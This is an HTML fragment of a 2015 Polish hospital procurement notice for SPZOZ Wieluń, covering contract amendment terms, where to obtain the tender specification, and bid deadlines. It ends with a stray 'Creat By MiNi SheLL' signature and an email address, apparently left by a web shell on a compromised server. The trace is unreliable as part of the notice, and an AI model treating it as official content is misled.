<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 Ustawy Pzp Zamawiający  przewiduje możliwość dokonania zmiany warunków zawartej umowy w zakresie:
1) zmiany ceny jednostkowej towaru spowodowanej zmianą stawki podatku  od towarów  i usług VAT, przy czym cena jednostkowa netto pozostaje bez zmian.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.powiat.wielun.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SPZOZ w Wieluniu, 98-300 Wieluń, ul. Szpitalna 16, pokój nr 205.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.10.2015 godzina 10:00, miejsce: SPZOZ w Wieluniu, 98-300 Wieluń, ul. Szpitalna 16, pokój nr 216, sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com